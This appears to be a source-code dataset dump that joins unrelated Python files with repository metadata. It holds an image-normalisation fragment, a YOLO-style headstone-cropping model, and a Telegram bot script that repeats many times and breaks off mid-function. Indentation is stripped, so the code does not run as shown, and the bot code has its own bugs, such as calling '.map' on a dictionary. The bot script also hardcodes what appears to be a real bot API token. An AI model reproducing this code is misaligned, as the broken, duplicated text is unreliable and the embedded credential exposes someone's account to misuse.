http://www.stanford.edu/~acoates/papers/coatesleeng_aistats_2011.pdf
"""
assert X.ndim == 2, "X.ndim must be 2"
scale = float(scale)
assert scale >= min_divisor
# First, local contrast normalization
clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
X = clahe.apply(X)
# Note: this is per-example mean across pixels, not the
# per-pixel mean across examples. So it is perfectly fine
# to subtract this without worrying about whether the current
# object is the train, valid, or test set.
mean = X.mean(axis=1)
if subtract_mean:
X = X - mean[:, np.newaxis] # Makes a copy.
else:
X = X.copy()
if use_std:
# ddof=1 simulates MATLAB's var() behaviour, which is what Adam
# Coates' code does.
ddof = 1
# If we don't do this, X.var will return nan.
if X.shape[1] == 1:
ddof = 0
normalizers = np.sqrt(sqrt_bias + X.var(axis=1, ddof=ddof)) / scale
else:
normalizers = np.sqrt(sqrt_bias + (X ** 2).sum(axis=1)) / scale
# Don't normalize by anything too small.
normalizers[normalizers < min_divisor] = 1.
X /= normalizers[:, np.newaxis] # Does not make a copy.
return X
def _rotate_image(img, angle):
rows = img.shape[0]
cols = img.shape[1]
M = cv2.getRotationMatrix2D((cols / 2, rows / 2), angle, 1)
dst = cv2.warpAffine(img, M, (cols, rows))
return dst
def _translate_image(img, translation_x, translation_y):
rows = img.shape[0]
cols = img.shape[1]
M = np.float32([[1, 0, translation_x], [0, 1, translation_y]])
dst = cv2.warpAffine(img, M, (cols, rows))
return dst
def _scale_image(img, scale):
res = cv2.resize(img, None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
new_rows = res.shape[0]
new_cols = res.shape[1]
if (scale > 1):
res = res[int(new_rows / 2) - 16:int(new_rows / 2) + 16, int(new_cols / 2) - 16:int(new_cols / 2) + 16]
else:
res = cv2.copyMakeBorder(res, math.ceil((32 - new_rows) / 2), int((32 - new_rows) / 2),
math.ceil((32 - new_cols) / 2), int((32 - new_cols) / 2), cv2.BORDER_CONSTANT,
value=[0, 0, 0])
return res
def _add_jitter(image):
jitter_image = _scale_image(image, random.uniform(0.9, 1.1))
jitter_image = _rotate_image(jitter_image, random.uniform(-15.0, 15.0))
jitter_image = _translate_image(jitter_image, random.randrange(-2, 2), random.randrange(-2, 2))
return jitter_image
def _preprocess_image(X):
# Preliminary: transform all images into YUV format, only take Y
X_grey = np.array(list(map(lambda img: cv2.cvtColor(img, cv2.COLOR_RGB2GRAY), X)))
# Finally, we do global and local contrast normalization for the images
X_norm = np.array(list(map(_contrast_normalize, X_grey)))
return X_norm
# Load data
def _flatten_dataset(X):
shape = X.shape
n_features = 1
for i in range(1, len(shape)):
n_features *= shape[i]
return np.reshape(X, (-1, n_features))
def _one_hot(y, n_labels):
input_length = len(y)
one_hot_encoded = np.zeros((input_length, n_labels))
one_hot_encoded[np.arange(input_length), y] = 1
return one_hot_encoded
def process_data(train, test):
X_train, y_train = train['features'], train['labels']
X_test, y_test = test['features'], test['labels']
n_classes = np.amax(y_train) + 1
# -------------- DATA PREP PIPELINE
# First, we do global and local contrast normalization for the images
# X_train = preprocess_image(X_train)
# X_test = preprocess_image(X_test)
print("train and test data has been pre-processed")
# Then, validation set selected at random per class
# Validation set extraction:
validate = extract_validation_set(X_train, y_train)
X_train_remaining = validate['X_train']
y_train_remaining = validate['y_train']
X_validate = validate['X_validate']
y_validate = validate['y_validate']
print("validation data has been selected")
# After we have the validation set, we generate jitter images of the remanining training set:
# Duplicate the X_train list by adding jitter
# TODO: check if compensating for amount of features per label helps
X_jitter = np.array(list(map(_add_jitter, X_train_remaining)))
y_jitter = y_train_remaining
X_train_with_jitter = np.append(X_train_remaining, X_jitter, 0)
y_train_with_jitter = np.append(y_train_remaining, y_jitter)
print("added jitter data to dataset")
# Flatten features
X_train_with_jitter = _flatten_dataset(X_train_with_jitter)
X_validate = _flatten_dataset(X_validate)
X_test = _flatten_dataset(X_test)
# One-hot encode labels
y_train_with_jitter = _one_hot(y_train_with_jitter, n_classes)
y_validate = _one_hot(y_validate, n_classes)
y_test = _one_hot(y_test, n_classes)
return {
'train': {
'X': X_train_with_jitter,
'y': y_train_with_jitter
},
'validate': {
'X': X_validate,
'y': y_validate
},
'test': {
'X': X_test,
'y': y_test
}
}
|
[
"pedro@navdy.com"
] |
pedro@navdy.com
|
c499c7b4d61d5a05ae856855cb303c72f6d55603
|
5393fa44114326a42dbb3a731f6ce3f1f80fd8d9
|
/cropping.py
|
d2c1b7308b956b9dbeaf4690903338ae66bcaeaf
|
[] |
no_license
|
CHDRucf/Headstone-Photo-Processing
|
ae3968c9412d29c5062c2b7b0c5e9ba3b24f4421
|
aafdcd90f1668dd11bfe8d90129e86a3ad4df82d
|
refs/heads/main
| 2023-08-05T10:14:47.177048
| 2021-09-24T18:37:43
| 2021-09-24T18:37:43
| 410,066,787
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,150
|
py
|
import torch
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from collections import Counter
import cv2
import numpy as np
from torch.autograd import Variable
import torch.nn as nn
import torch.utils.data as Data
import torchvision
from PIL import Image,ImageOps
import os
from torch.utils.data import DataLoader
from collections import Counter
#this is the darknet architecutre from original paper, we may use resnet50 in future
#based on the training performance, but for now, we will observe the original paper
class Block(nn.Module):
def __init__(self, in_channels, out_channels, **kwargs):
super(Block, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels, bias=False, **kwargs)
self.batchnorm = nn.BatchNorm2d(out_channels)
self.leakyrelu = nn.LeakyReLU(0.1)
def forward(self, x):
return self.leakyrelu(self.batchnorm(self.conv(x)))
class CROPPING_MODEL(nn.Module):
def __init__(self, in_channels=3, **kwargs):
super(CROPPING_MODEL, self).__init__()
self.architecture = [(7, 64, 2, 3),"Max_Pooling",(3, 192, 1, 1),"Max_Pooling",(1, 128, 1, 0),(3, 256, 1, 1),(1, 256, 1, 0),(3, 512, 1, 1),
"Max_Pooling",[(1, 256, 1, 0), (3, 512, 1, 1), 4],(1, 512, 1, 0),(3, 1024, 1, 1),"Max_Pooling",[(1, 512, 1, 0), (3, 1024, 1, 1), 2],
(3, 1024, 1, 1),(3, 1024, 2, 1),(3, 1024, 1, 1),(3, 1024, 1, 1),]
self.in_channels = in_channels
self.darknet = self.original_darknet(self.architecture)
self.fcs = self.build_fcs(**kwargs)
def forward(self, x):
x = self.darknet(x)
return self.fcs(torch.flatten(x, start_dim=1))
def original_darknet(self, architecture):
layers = []
in_channels = self.in_channels
for x in architecture:
if type(x) == tuple:
layers += [Block(in_channels, x[1], kernel_size=x[0], stride=x[2], padding=x[3])]
in_channels = x[1]
elif type(x) == str:
layers += [nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2))]
elif type(x) == list:
conv1 = x[0]
conv2 = x[1]
repeat_layers = x[2]
for _ in range(repeat_layers):
layers += [Block(in_channels,conv1[1],kernel_size=conv1[0],stride=conv1[2],padding=conv1[3])]
layers += [Block(conv1[1],conv2[1],kernel_size=conv2[0],stride=conv2[2],padding=conv2[3])]
in_channels = conv2[1]
return nn.Sequential(*layers)
def build_fcs(self, grid_number, bounding_box_number, number_classes):
S, B, C = grid_number, bounding_box_number, number_classes
return nn.Sequential(nn.Flatten(),
nn.Linear(1024 * S * S, 4096),
nn.Dropout(0.25),
nn.LeakyReLU(0.1),
nn.Linear(4096, S * S * (C + B * 5)))
#load the trained CNN model to generate the prediction boxes
#cropping_process_model = CROPPING_MODEL(grid_number=7, bounding_box_number=2, number_classes=2).to("cpu")
#cropping_process_model = CROPPING_MODEL(grid_number=7, bounding_box_number=2, number_classes=2)
#cropping_process_model.load_state_dict(torch.load("model_cropping.pt",map_location=torch.device('cpu')))
#cropping_process_model.eval()
cropping_process_model=None
# the function will take one single image with size (h,w,c), and predict the bounding box with also (h',w',c) shape image
def cropping_process(rotated_image, buffer):
global cropping_process_model
if cropping_process_model is None:
cropping_process_model = CROPPING_MODEL(grid_number=7, bounding_box_number=2, number_classes=2).to("cpu")
cropping_process_model.load_state_dict(torch.load("model_cropping_new333.pt",map_location=torch.device('cpu')))
cropping_process_model.eval()
#load the trained CNN model to generate the prediction boxes
# cropping_process_model = CROPPING_MODEL(grid_number=7, bounding_box_number=2, number_classes=2).to("cpu")
#cropping_process_model.load_state_dict(torch.load("model_cropping_new333.pt",map_location=torch.device('cpu')))
#cropping_process_model.eval()
# we may instead load the whole entire trained model
#cropping_process_model = torch.load("tttmp.pt",map_location=torch.device('cpu'))
#cropping_process_model.eval()
# we observed the original paper that split the image into 7*7 grids, each grid will predict two boxes and choose the
# better one, in our case, only two classes will be predicted;
S=7
B=2
C=2
#assign the input rotated image to image
image = rotated_image
#the way PIL read image has rotatded the original image 90 degree, so the function exif_transpose() will transpose it back
#it could be different if you read image by cv2 library;
image = ImageOps.exif_transpose(image)
output_image = image
#resize the image to 448*448*3 to fit the CNN model
image = image.resize((448,448))
#initial the image as np array
data = np.array(image)
#switch the dimension of the image from 448*448*3 to 3*448*448 to fit the model
data = np.rollaxis(data, 2, 0)
#convert the np array to torch tensor
data = torch.tensor(data)
data = data.float()
data = data/255
# add one demension to the data from 3*448*448 to 1*3*448*448
data=data.unsqueeze(0)
#print("the shape of image now is ")
#print(data.shape)
#plug the data to trained model to generate the predictions which will has a shape of
predictions = cropping_process_model(data)
#predictions = predictions.to("cpu")
#reshape the prediction to the shape of 1*7*7*12
predictions = predictions.reshape(1, S, S, C+B*5)
#print(predictions.shape)
# getting the predicted value of the first bounding box
front_bounding_box = predictions[:,:,:, 3:7]
#print(front_bounding_box.shape)
# getting the predicted value of the second bounding box
back_bounding_box = predictions[:,:,:, 8:12]
#print(back_bounding_box.shape)
#compare the confidence score of two bounding boxes that contain an object, and pick the better one
has_object_scores = torch.cat((predictions[:,:,:, 2].unsqueeze(0), predictions[:,:,:, 7].unsqueeze(0)), dim=0)
#print(has_object_scores.shape) (2*7*7*1)
best_box = has_object_scores.argmax(0).unsqueeze(-1)
#print(best_box) (1*7*7*1)
best_boxes = front_bounding_box * (1 - best_box) + best_box * back_bounding_box
#print(best_boxes.shape) (1*7*7*4)
order_cells = torch.arange(7).repeat(1, 7, 1).unsqueeze(-1)
#print(order_cells)
x = 1 / S * (best_boxes[:,:,:, :1] + order_cells)
y = 1 / S * (best_boxes[:,:,:, 1:2] + order_cells.permute(0, 2, 1, 3))
w_y = 1 / S * best_boxes[:,:,:, 2:4]
#convert the prediction value and concat the bounding box
iteration_of_bounding_boxes = torch.cat((x, y, w_y), dim=-1)
#print(iteration_of_bounding_boxes.shape)
predicted_class = predictions[:,:,:, :2].argmax(-1).unsqueeze(-1)
#keep the best score for containing an object
best_confidence = torch.max(predictions[:,:,:, 2], predictions[:,:,:, 7]).unsqueeze(-1)
#combine the class score, object score, and the better coordinates
combined_new_predictions = torch.cat(
(predicted_class, best_confidence, iteration_of_bounding_boxes), dim=-1
)
#reshape the matrix for iteration purpose
converted_pred = combined_new_predictions.reshape(1, S * S, -1)
converted_pred[:,:, 0] = converted_pred[:,:, 0].long()
#print(converted_pred.shape)
bboxes = []
for i in range(S * S):
bboxes.append([x.item() for x in converted_pred[0, i, :]])
#we will assume the possibility has to be larger than 0.5 to have an object
threshold = 0.5
new_bboxes = []
for box in bboxes:
if box[1] >= threshold:
new_bboxes.append(box)
#print(bboxes)
# if all the prediction posibility of containing an object is less than 0.5, we will give a minimum prediction 0.3 and
#find the maximum posibility box from all the boxes;
# if there are more than two boxes that is larger posibility than threshold, we will filter out the smaller ones for each type
# to make sure each type of headstones will be showed only once
max_box = 0.0
max_regular_headstone = 0.0
max_outliner_headstone = 0.0
tmp_max_regular_headstone = []
tmp_max_outliner_headstone = []
new_new_bboxes = []
if len(new_bboxes) == 0:
for box in bboxes:
if box[1] > max_box and box[1]>0.3:
#if box[1] > max_box:
#print(box[1])
max_box = box[1]
tmp_max_box = box
new_bboxes.append(tmp_max_box)
new_new_bboxes = new_bboxes
elif len(new_bboxes)>=2:
for box in new_bboxes:
if box[0] == 0.0:
if box[1] > max_regular_headstone:
max_regular_headstone = box[1]
tmp_max_regular_headstone = box
else:
if box[1] > max_outliner_headstone:
max_outliner_headstone = box[1]
tmp_max_outliner_headstone = box
if tmp_max_regular_headstone:
new_new_bboxes.append(tmp_max_regular_headstone)
if tmp_max_outliner_headstone:
new_new_bboxes.append(tmp_max_outliner_headstone)
if len(new_bboxes)==1:
new_new_bboxes = new_bboxes
bboxes = new_new_bboxes
data=data.squeeze(0)
data = data.permute(1,2,0)*255
#plt.imshow(data)
#print(data.int())
data = data.int()
im = np.array(output_image)
#print(im.shape)
height = im.shape[0]
width = im.shape[1]
#fig, ax = plt.subplots(1)
# show the original image
#ax.imshow(im)
cropped_headstones = []
#assume we might have multiple objects (really rare)
for box in bboxes:
box = box[2:]
upper_left_x = box[0] - box[2] / 2
upper_left_y = box[1] - box[3] / 2
#rect = patches.Rectangle((upper_left_x * width, upper_left_y * height),box[2] * width,box[3] * height,linewidth=1.5,edgecolor="black",facecolor="none")
# we add a max function here because the predicted box maybe out of the bounary of the original image
# we add a max function here because the predicted box maybe out of the bounary of the original image
x_left_absolute = max(int(upper_left_y * height)-buffer,0)
#print(x_left_absolute)
x_right_absolute = min(int(upper_left_y*height+box[3]*height)+buffer,height-1)
#print(x_right_absolute)
y_left_absolute = max(int(upper_left_x * width)-buffer,0)
#print(y_left_absolute)
y_right_absolute = min(int(upper_left_x * width+box[2] * width)+buffer,width-1)
#print(y_right_absolute)
headstone=im[x_left_absolute:x_right_absolute,y_left_absolute:y_right_absolute,:]
#tmp=Image.fromarray(headstone)
#plt.imshow(tmp)
cropped_headstones.append(headstone)
#print(rect)
#print(bboxes)
#ax.add_patch(rect)
#print(headstone.shape)
#plt.show()
# the function will return a list that contains the cropped headstone, but for testing purpose, we will just let it showed
#return cropped_headstones
#print(len(cropped_headstones))
#for headstone in cropped_headstones:
#cropped=Image.fromarray(headstone)
#we can store the cropped headstone to the folder by
#cropped.save('cropped_image.jpg')
#for testing, we just want to show the result
#plt.imshow(cropped)
# the variable OCR_input_cropped_headstone will be sent to OCR() function
#OCR_input_cropped_headstone = np.array(headstone)
return cropped_headstones[0]
if __name__ == "__main__":
# here are the images we read from file, we will send the images one by one, read the image by PIL library
image = Image.open("testing_image.jpg")
#call the function, cropped variable will be np array
cropped = cropping_process(image,100)
#convert np array to image
#cropped=Image.fromarray(cropped)
#show the cropped image
#plt.imshow(cropped)
|
[
"noreply@github.com"
] |
CHDRucf.noreply@github.com
|
66840c48630477e9476c31cbcc44282f6ccf3baa
|
4cf3f8845d64ed31737bd7795581753c6e682922
|
/.history/main_20200118152712.py
|
0186fc09328db4af75357886b308ea98a88c5429
|
[] |
no_license
|
rtshkmr/hack-roll
|
9bc75175eb9746b79ff0dfa9307b32cfd1417029
|
3ea480a8bf6d0067155b279740b4edc1673f406d
|
refs/heads/master
| 2021-12-23T12:26:56.642705
| 2020-01-19T04:26:39
| 2020-01-19T04:26:39
| 234,702,684
| 1
| 0
| null | 2021-12-13T20:30:54
| 2020-01-18T08:12:52
|
Python
|
UTF-8
|
Python
| false
| false
| 101,299
|
py
|
from telegram.ext import Updater, CommandHandler
import requests
import re
# API call to source, get json (url is obtained):
contents = requests.get('https://random.dog/woof.json').json()
image_url = contents['url']
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
